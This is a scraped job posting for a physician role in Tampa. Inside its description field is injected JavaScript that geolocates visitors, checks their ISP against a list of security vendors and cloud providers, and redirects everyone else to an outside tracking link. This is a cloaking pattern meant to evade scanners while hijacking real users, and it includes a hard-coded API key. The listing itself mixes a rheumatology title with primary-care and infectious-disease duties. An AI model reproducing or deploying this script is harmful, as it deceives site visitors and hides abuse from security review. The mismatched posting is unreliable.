Physician, Rheumatology

Tampa, FL
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/30ec66665c67f2b4/48a3637a680fab165e351bc16764095e57e915531ecd6305f247a662a1a44e1b/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Seeking a full-time MD/DO for outpatient primary care in a clinic setting, Monday through Friday.

  • Provide high-quality evaluations, treatment plans, and comprehensive primary care, including management of Hepatitis C, HIV, and STI prevention.
  • Perform and document HPI, physical exams, diagnostic tests, and referrals based on evidence-based practices.
  • Collaborate with a team of healthcare professionals, ensuring thorough documentation in EMR and timely chart completion.
  • Review lab results, coordinate follow-up, and ensure treatment orders are executed.
  • Screen and refer patients to community services as needed, working with collaborating physicians for complex cases.
  • Develop patient-specific interventions and contribute to practice efficiency and standard protocols.
  • Maintain knowledge of primary care and infectious disease management, with a willingness to learn.
  • Excellent communication skills and team relationships required. Software used includes Microsoft Office and ECW EMR.

  • Requirements: Medical license, board certification, DEA registration, Master’s degree, and at least 1 year of rheumatology experience preferred.
    Compensation: $100-$125/hour with health benefits and PTO.